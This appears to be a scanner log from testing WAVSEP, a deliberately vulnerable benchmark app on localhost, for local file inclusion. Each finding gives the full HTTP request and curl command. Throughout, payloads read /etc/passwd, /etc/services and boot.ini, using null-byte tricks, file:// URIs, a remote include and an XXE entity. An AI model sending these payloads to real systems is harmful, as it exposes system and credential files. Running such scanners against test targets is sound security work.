GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
